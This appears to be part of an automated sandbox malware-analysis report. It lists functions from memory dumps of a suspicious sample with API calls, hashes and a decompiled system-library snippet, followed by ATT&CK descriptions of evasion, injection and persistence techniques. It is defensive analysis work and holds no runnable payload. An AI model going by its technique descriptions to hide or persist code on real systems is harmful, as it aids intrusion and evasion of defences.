Opcode Fuzzy Hash: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
Instruction Fuzzy Hash: 33313275A00209AFDB14DFD8D8809EFB7B9FF88304B148559E915E7214D775EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E5175C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00E43AC6,00000000), ref: 00E51777

Strings

@J7<, xrefs: 00E5178B

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 6b98126c706a992c091d87325379bb175d9795ef197844bc663978847de44975
Instruction ID: ea2a2cf2bbc36df53cea11e4ba3ef7aa5f47de22e5ffc2e9824745caf619295d
Opcode Fuzzy Hash: 6b98126c706a992c091d87325379bb175d9795ef197844bc663978847de44975
Instruction Fuzzy Hash: 333121B5A0020A9FDB14DFD8D8809EFB7B9FF88304B148559E915E7214D775EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E47280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E472DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E472FB

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction ID: fe052c5bfcbe2e2f010cf3a6747447007877e995545197062a7ad000140ca580
Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction Fuzzy Hash: 9E01A771A8022977E721AAA5AC03FBF77AC5B41B51F150118FF04BA1C2EAD4690587F6

Uniqueness

Uniqueness Score: -1.00%

Function 00E47253 Relevance: 3.0, APIs: 2, Instructions: 26threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E472DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E472FB

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ee519120761a543cb618e7c1acabd153bfe9ebd3505fadf20a78b209d3fbe733
Instruction ID: d9971e571eec54d31f25d8eceb28f5acb796d9c728a7c5064b1aa75e6179a536
Opcode Fuzzy Hash: ee519120761a543cb618e7c1acabd153bfe9ebd3505fadf20a78b209d3fbe733
Instruction Fuzzy Hash: B7E0C29668421936E61115947C02EBE36589B92B5AF0010BAFE48E85D3EB8A481DA2F3

Uniqueness

Uniqueness Score: -1.00%

Function 00E49B33 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E49BB2

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a995591dc99b78b86d9432d14c72b8eeb7d3ec645dbef0f31d5dbad7bbd6d41e
Instruction ID: ad171d2620d3d7abbcbd0b7debb2f6682cff8e6c42174c6a49a6a7586b6f4aab
Opcode Fuzzy Hash: a995591dc99b78b86d9432d14c72b8eeb7d3ec645dbef0f31d5dbad7bbd6d41e
Instruction Fuzzy Hash: BD015EB5E4010DBBDF10DBA4E842FDEB778DB94708F044595ED08AB281F671AB48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E49B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E49BB2

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 51112992ce39f05a31a96a2eb7e2d37d4cec3e6b192422e34da9a8ee82ed49df
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 460112B5D4010DB7DF10DAA4EC42F9EB7B89B54309F004595ED08B7245F671EB18C791

Uniqueness

Uniqueness Score: -1.00%

Function 00E58960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E589B4

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: dfef2ccdcd7551f7f390968e2afaeb03aec9f044e13feee30093d44fe411e51a
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 0501AFB2214108ABCB54DF99DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E5895E Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E589B4

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f4de30554a86f48d838a324a6c7699072645b7c1ad1384e98855ead4155cea09
Instruction ID: 2e6e75d5db883c0bb7d48c63ea37b7e4c88d117852ea8102254eacd1ab7a8f8e
Opcode Fuzzy Hash: f4de30554a86f48d838a324a6c7699072645b7c1ad1384e98855ead4155cea09
Instruction Fuzzy Hash: A801B2B2210108BFCB54CF99DD80EEB37ADAF8C354F158248FA0DA7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E57430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E4CCF0,?,?), ref: 00E5746C

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
Instruction ID: ddb71c0f365f40f78b3dc9b64b8469090646ecb33ea835c79f194db0c9d3ecb1
Opcode Fuzzy Hash: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
Instruction Fuzzy Hash: 2FE092733803043AE33065A9AC03FA7B3DCCB81B65F950426FA4DFB2C1D995F80542A4

Uniqueness

Uniqueness Score: -1.00%

Function 00E58A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00E4CFC2,00E4CFC2,?,00000000,?,?), ref: 00E58A80

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 93f5dc27497cb856a2374eb19dc4cbbb9b1fc478705c7102f174411ee302c16f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 3DE01AB1200218ABDB10DF59CC85EE737ADAF88650F018554FE0867242CA30E914CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D427 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00E47C83,?), ref: 00E4D45B

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a22f2f26b2fd95a7a45a6f73a0c6292655c57cba58eb4997b584a6233780a957
Instruction ID: 282fd9c865b2f7a77b9e3c4f6449a658581ce0369912c50a464859b62701a6a6
Opcode Fuzzy Hash: a22f2f26b2fd95a7a45a6f73a0c6292655c57cba58eb4997b584a6233780a957
Instruction Fuzzy Hash: ECE02B753443003EE711FBB49C03F5A6BC45F56754F0D426CF989E72C3DA24D9018120

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00E47C83,?), ref: 00E4D45B

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: a4b9aa111b1008f37e95c826aa54ea4ee93a05f8a080698baa21f479f5f1d074
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 8AD0A7717503043BE710FAA49C13F2633CC5B45B44F494064FA49E73C3DD60F5008161

Uniqueness

Uniqueness Score: -1.00%

Function 04EA967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA9694

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebb180a2c6be4c62b21d184f5000600cea6351327498561442dd3955f80a61f1
Instruction ID: f8f7ea86bdd8e6d6e6617ba9db30f1e25f784ca3985de34c846307eaf22ad010
Opcode Fuzzy Hash: ebb180a2c6be4c62b21d184f5000600cea6351327498561442dd3955f80a61f1
Instruction Fuzzy Hash: BBB09BB19014D5C6F751D7605A08B177904BBD4745F16D461D1420641B477CF091F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04EFFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04EFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04EACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04EF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04EF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04effdda
0x04effde2
0x04effde5
0x04effdec
0x04effdfa
0x04effdff
0x04effe0a
0x04effe0f
0x04effe17
0x04effe1e
0x04effe19
0x04effe19
0x04effe19
0x04effe20
0x04effe21
0x04effe22
0x04effe25
0x04effe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EFFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EFFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EFFE2B

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 0c3805b6762c6acfe5cbb783c8ad45a4474a41d8da4901d6bad6c5a9517c2861
Instruction ID: 69b74f614164f5e229e4474a1da5c6d59774efc01f4cf4ad34372f3578955617
Opcode Fuzzy Hash: 0c3805b6762c6acfe5cbb783c8ad45a4474a41d8da4901d6bad6c5a9517c2861
Instruction Fuzzy Hash: 67F0F632640601BFE6241B45DC02F23BF6AEB44730F245355F7285A1E1EAA2F8309BF4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: d6wtv4o01bbhxt.exePID: 1140, Parent PID: 3352COMMON

Executed Functions

Function 030F16D8 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

`BgnnC, xrefs: 030F1715, 030F1727
$,qm, xrefs: 030F176D

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID: $,qm$`BgnnC
API String ID: 0-3725215061
Opcode ID: d5a3ad6c36fadb66f3203def1821502369b9518ef2dee1ff8c3361c31dac1ccf
Instruction ID: 85d6d248d778c3dba6854e903341cca43a71d3e795e1e95f0cfb2519df52864f
Opcode Fuzzy Hash: d5a3ad6c36fadb66f3203def1821502369b9518ef2dee1ff8c3361c31dac1ccf
Instruction Fuzzy Hash: AD110630B042049FCB29EBB8E45469EB7FAEF85214F1444B5DA05EB294EF345C02CB92

Uniqueness

Uniqueness Score: -1.00%

Function 030F0728 Relevance: 1.9, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

`BgnnC, xrefs: 030F0A24

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID: `BgnnC
API String ID: 0-1991088383
Opcode ID: a9a0116c435aff30115a01019e1de0c611ab905c0e79d0e3066e2ecaa35a53eb
Instruction ID: b19cbb7c99fe9f2afaa1e3d6e2a501e9ca3eaac99692fd569fc4c344ec887297
Opcode Fuzzy Hash: a9a0116c435aff30115a01019e1de0c611ab905c0e79d0e3066e2ecaa35a53eb
Instruction Fuzzy Hash: 7E810331A043458FDB25DFB4D42869EBBF2EF89314F18C969DA429B665DF34AC81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 030F0F38 Relevance: 1.8, Strings: 1, Instructions: 510COMMON

Download Yara Rule

Strings

`BgnnC, xrefs: 030F1560, 030F159B, 030F15D3, 030F161A, 030F165C, 030F1695

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID: `BgnnC
API String ID: 0-1991088383
Opcode ID: 87042b75fb8a5ba0a7fe25e38da0eaf6d3fef5914079124736072bb5df3ec553
Instruction ID: df9e7b20ba27700f0d6e3fb0af49806ec307fbaef6100906626cad44b1824434
Opcode Fuzzy Hash: 87042b75fb8a5ba0a7fe25e38da0eaf6d3fef5914079124736072bb5df3ec553
Instruction Fuzzy Hash: 70224030B05601CFD728DF68E4A466AB3A6FBC9315F148978DA0687788DB35EC52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 030F0E31 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c45ed5ab77e39001886fd8668d0bd8e4eb3cdd94e50f835e83984dfd90f67510
Instruction ID: c882cf1e3d74329c4afbf6d34cedad7d8cf7a353289614f6ea03d2a0ef577cd3
Opcode Fuzzy Hash: c45ed5ab77e39001886fd8668d0bd8e4eb3cdd94e50f835e83984dfd90f67510
Instruction Fuzzy Hash: 29313C747442108FC759EB78C46892D73E2AF89A1931608ADE606CF7B5DB36EC42CB85

Uniqueness

Uniqueness Score: -1.00%

Function 030F0E40 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c88a155bc74d20cfd4df329a87d0a8e006c37d2680667bdb15777b5892fb52f
Instruction ID: 3fc743b68a532c3f16be035c93104b3d036a31c2ab406de550b662cab6df12c4
Opcode Fuzzy Hash: 6c88a155bc74d20cfd4df329a87d0a8e006c37d2680667bdb15777b5892fb52f
Instruction Fuzzy Hash: 8F2107747442108FC758AB78D46892D73E6AF89A1932208BDE606CF7B5DF32DC42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 030F17F8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8839b239b5f444be71f98feb6bb2bd0832c257cb565dbcdb815cba82c1819381
Instruction ID: 5bdbfe4f5dd2ba82d89d1c267d3921107c25c43495205ab4e8493d4b50b18c94
Opcode Fuzzy Hash: 8839b239b5f444be71f98feb6bb2bd0832c257cb565dbcdb815cba82c1819381
Instruction Fuzzy Hash: AA11E535E00209DFCB04DFB9E8449DEFBB5FF8D210B158266DA1997611E7349910CB80

Uniqueness

Uniqueness Score: -1.00%

Function 030F1808 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3b36e169bdbcb6f97500731857809c75b6fa4400c29738611c1f255df8475e
Instruction ID: 62befa783234a3408302cb5c4f27997e64d1c041783cfe7961db275d24c0d4c3
Opcode Fuzzy Hash: 5d3b36e169bdbcb6f97500731857809c75b6fa4400c29738611c1f255df8475e
Instruction Fuzzy Hash: 12015275E00205DFCB44DFB9E84489EFBB5FF8D2107118266EA159B721E734A911CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030F0480 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c57872e64ea627628451a189152978b197352fbd8dd05f366a48b4827296b1b
Instruction ID: 73921bf1d9bdcd52a78e2e69217b39e382d0e30398026fe56a04a10c77e95338
Opcode Fuzzy Hash: 3c57872e64ea627628451a189152978b197352fbd8dd05f366a48b4827296b1b
Instruction Fuzzy Hash: E5F0C27080E3A59FCB529BB4984418D7FF0AE07210B0D40F7C989DB553E2684D09CB93

Uniqueness

Uniqueness Score: -1.00%

Function 030F0B9C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8660138bcc6f474e44a21642eba0d2fd9c1d5cb5ac562efcb3cba8349a0614e5
Instruction ID: 94577c951c5b794a3e2542b456451a3821d65aa9e68080d9b1652dedffdd9144
Opcode Fuzzy Hash: 8660138bcc6f474e44a21642eba0d2fd9c1d5cb5ac562efcb3cba8349a0614e5
Instruction Fuzzy Hash: 59F01C70A052098FDB24DBA4C4587AD7BF0AF48328F254899D502AB6A2CB759D80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030F04A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.774280139.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_30f0000_d6wtv4o01bbhxt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5064120f2bcf42b383a30fac6a2b18a215888ee79a7bd777426a500e1d7908e0
Instruction ID: 6af0ea89d20b3ec4a1e085aa1d1fdda76305b4e7ecb7578350dc55377db045a5
Opcode Fuzzy Hash: 5064120f2bcf42b383a30fac6a2b18a215888ee79a7bd777426a500e1d7908e0
Instruction Fuzzy Hash: 73D062B1D052199F8B50EFB999051DEBBF4EA08250F104565D919E3605E6705A108BD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

